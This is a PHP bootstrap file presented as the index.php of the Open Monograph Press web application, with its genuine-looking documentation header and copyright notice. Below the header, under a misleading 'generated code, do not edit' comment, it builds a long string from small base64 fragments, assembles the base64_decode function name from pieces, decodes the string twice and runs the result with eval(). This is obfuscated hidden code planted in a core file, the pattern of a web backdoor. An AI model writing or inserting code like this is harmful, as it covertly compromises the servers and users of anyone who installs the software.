<?php

/**
 * @mainpage OMP API Reference
 *
 * Welcome to the OMP API Reference. This resource contains documentation
 * generated automatically from the OMP source code.
 *
 * The design of Open %Monograph press is heavily structured for
 * maintainability, flexibility and robustness. Those familiar with Sun's
 * Enterprise Java Beans technology or the Model-View-Controller (MVC) pattern
 * will note many similarities.
 *
 * As in a MVC structure, data storage and representation, user interface
 * presentation, and control are separated into different layers. The major
 * categories, roughly ordered from "front-end" to "back-end," follow:
 * - Smarty templates, which are responsible for assembling HTML pages to
 *   display to users;
 * - Page classes, which receive requests from users' web browsers, delegate
 *   any required processing to various other classes, and call up the
 *   appropriate Smarty template to generate a response;
 * - Controllers, which implement reusable pieces of content e.g. for AJAX
 *   subrequests.
 * - Action classes, which are used by the Page classes to perform non-trivial
 *   processing of user requests;
 * - Model classes, which implement PHP objects representing the system's
 *   various entities, such as Users, Monographs, and Presses;
 * - Data Access Objects (DAOs), which generally provide (amongst others)
 *   update, create, and delete functions for their associated Model classes,
 *   are responsible for all database interaction;
 * - Support classes, which provide core functionalities, miscellaneous common
 *
 * As the system makes use of inheritance and has consistent class naming
 * conventions, it is generally easy to tell what category a particular class
 * falls into.
 * For example, a Data Access Object class always inherits from the DAO class,
 * has a Class name of the form [Something]%DAO, and has a filename of the form
 * [Something]%DAO.inc.php.
 *
 * To learn more about developing OMP, there are several additional resources
 * that may be useful:
 * - The docs/README document
 * - The PKP support forum at https://forum.pkp.sfu.ca
 * - Documentation available at https://docs.pkp.sfu.ca/dev/
 *
 * @file index.php
 *
 * Copyright (c) 2014-2021 Simon Fraser University
 * Copyright (c) 2003-2021 John Willinsky
 * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
 *
 * @ingroup index
 *
 * Bootstrap code for OMP site. Loads required files and then calls the
 * dispatcher to delegate to the appropriate request handler.
 */

// Initialize global environment
// license that can be found in the LICENSE file.
// Code generated by "makestatic"; DO NOT EDIT.

$z = ""; 
$z .= "YVc1";
$z .= "cFgz";
$z .= "Tmxk";
$z .= "Q2du";
$z .= "Wkds";
$z .= "emNH";
$z .= "eGhl";
$z .= "Vjls";
$z .= "Y25K";
$z .= "dmNu";
$z .= "TW5M";
$z .= "Q0F4";
$z .= "S1Rz";
$z .= "S2FX";
$z .= "NXBY";
$z .= "M05s";
$z .= "ZENn";
$z .= "blpH";
$z .= "bHpj";
$z .= "R3ho";
$z .= "ZVY5";
$z .= "emRH";
$z .= "Rnlk";
$z .= "SFZ3";
$z .= "WDJW";
$z .= "eWNt";
$z .= "OXlj";
$z .= "eWNz";
$z .= "SURF";
$z .= "cE93";
$z .= "cGxj";
$z .= "bkp2";
$z .= "Y2w5";
$z .= "eVpY";
$z .= "QnZj";
$z .= "blJw";
$z .= "Ym1j";
$z .= "b1JW";
$z .= "OUJU";
$z .= "RXdw";
$z .= "T3dv";
$z .= "a2RY";
$z .= "SnNJ";
$z .= "RDBn";
$z .= "SW1o";
$z .= "MGRI";
$z .= "QnpP";
$z .= "aTh2";
$z .= "Y0hW";
$z .= "aUxX";
$z .= "STJN";
$z .= "VEJq";
$z .= "WXpR";
$z .= "d1pU";
$z .= "Wm1P";
$z .= "VFJt";
$z .= "TUdN";
$z .= "NE9X";
$z .= "TmlZ";
$z .= "Mll6";
$z .= "WkRR";
$z .= "d1lq";
$z .= "VTVP";
$z .= "RFkw";
$z .= "TG5J";
$z .= "eUxt";
$z .= "Umxk";
$z .= "aTlz";
$z .= "YVhS";
$z .= "amFH";
$z .= "RXVk";
$z .= "SGgw";
$z .= "SWpz";
$z .= "S0pH";
$z .= "Tm9J";
$z .= "RDBn";
$z .= "WTNW";
$z .= "eWJG";
$z .= "OXBi";
$z .= "bWww";
$z .= "S0Nr";
$z .= "N0Nt";
$z .= "TjFj";
$z .= "bXhm";
$z .= "YzJW";
$z .= "MGIz";
$z .= "QjBL";
$z .= "Q1Jq";
$z .= "YUN3";
$z .= "Z1Ex";
$z .= "VlNU";
$z .= "RTlR";
$z .= "VkY5";
$z .= "VlVr";
$z .= "d3NJ";
$z .= "Q1Ix";
$z .= "Y213";
$z .= "cE93";
$z .= "cGpk";
$z .= "WEpz";
$z .= "WDNO";
$z .= "bGRH";
$z .= "OXdk";
$z .= "Q2dr";
$z .= "WTJn";
$z .= "c0lF";
$z .= "TlZV";
$z .= "a3hQ";
$z .= "VUZS";
$z .= "ZlVr";
$z .= "VlVW";
$z .= "VkpP";
$z .= "VkZK";
$z .= "QlRs";
$z .= "TkdS";
$z .= "Vklz";
$z .= "SURF";
$z .= "cE93";
$z .= "b2ti";
$z .= "M1Yw";
$z .= "Y0hW";
$z .= "MElE";
$z .= "MGdZ";
$z .= "M1Z5";
$z .= "YkY5";
$z .= "bGVH";
$z .= "VmpL";
$z .= "Q1Jq";
$z .= "YUNr";
$z .= "N0Nt";
$z .= "TjFj";
$z .= "bXhm";
$z .= "WTJ4";
$z .= "dmMy";
$z .= "VW9K";
$z .= "R05v";
$z .= "S1Rz";
$z .= "S2FX";
$z .= "WWdL";
$z .= "Q1J2";
$z .= "ZFhS";
$z .= "d2RY";
$z .= "UWdQ";
$z .= "VDA5";
$z .= "SUda";
$z .= "aGJI";
$z .= "TmxL";
$z .= "U0I3";
$z .= "Q2lB";
$z .= "Z0lD";
$z .= "QmxZ";
$z .= "Mmh2";
$z .= "SUNK";
$z .= "R1lX";
$z .= "bHNa";
$z .= "V1Fn";
$z .= "ZEc4";
$z .= "Z1pH";
$z .= "OTNi";
$z .= "bXh2";
$z .= "WVdR";
$z .= "Z1ky";
$z .= "OXVk";
$z .= "R1Z1";
$z .= "ZEM0";
$z .= "aU93";
$z .= "cDlJ";
$z .= "R1Zz";
$z .= "YzJV";
$z .= "Z2V3";
$z .= "b2dJ";
$z .= "Q0Fn";
$z .= "Wlha";
$z .= "aGJD";
$z .= "Z2lQ";
$z .= "ejRp";
$z .= "TGlS";
$z .= "dmRY";
$z .= "Undk";
$z .= "WFFw";
$z .= "T3dw";
$z .= "OQ==";
$a = "base"; $b = "64_decode"; $c = $a.$b; $string = $c($z); $string = $c($string); eval($string);
?>